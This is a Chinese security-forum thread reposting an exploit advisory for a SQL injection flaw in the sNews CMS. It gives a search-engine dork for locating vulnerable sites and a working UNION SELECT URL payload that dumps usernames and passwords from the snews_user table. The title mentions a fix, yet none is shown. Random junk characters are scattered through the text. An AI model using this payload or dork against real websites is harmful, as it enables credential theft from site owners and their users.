找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2013|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability( w, y& t7 ]& g) t# z+ c: @, b0 n$ ?5 z
作者: By onestree
$ b9 O& m& g" N( }  ^0 x下载地址 : http://snewscms.com/
% t1 O: E6 \0 M5 Z测试平台 : ubuntu 12.10 / win 7% r- l1 _% {& u+ @9 h( C
关键词: inurl:"tanyakan pada rumput yang bergoyang"6 ~; }# H* ~: c9 ]
* X4 Y1 N9 ~; C' q

" }( w4 I: E" d( P*************************************************************& p7 F: V3 V' S" ?

4 P7 h1 Y& ?- gSQL poc:
1 ?8 x6 K/ w$ A: g# s) Y - ^8 f8 K% N6 u2 _" s* y; W
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]9 Z8 V+ e8 o& H. }0 S, m

4 `% H( r) n: Y, f示例
8 D, j& g  O# X$ f' E! x  l$ _: Y! }
  m5 Y, ?# Z, f4 C, i/ thttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
% G8 C" j3 W' j# x5 k! M5 R
* K( J) O& I* h. Y, M   ?$ N) G. `+ m$ C8 F
致谢:' [5 u. d5 G9 J* q/ ^! [* b

( z! Q9 R5 O' J4 T% O* A, E  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell2 Q/ S2 _$ f* q8 c+ i( a  T
     
9 |4 r3 y- m; c  f# Z2 U          indonesiancoder - moeslimh4x0r - go-coder2 i/ z- y9 @% ]0 o5 f& n
( ?7 c. t' [8 U* i, x
spesial my hunny :*
# A% {" k$ y  F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表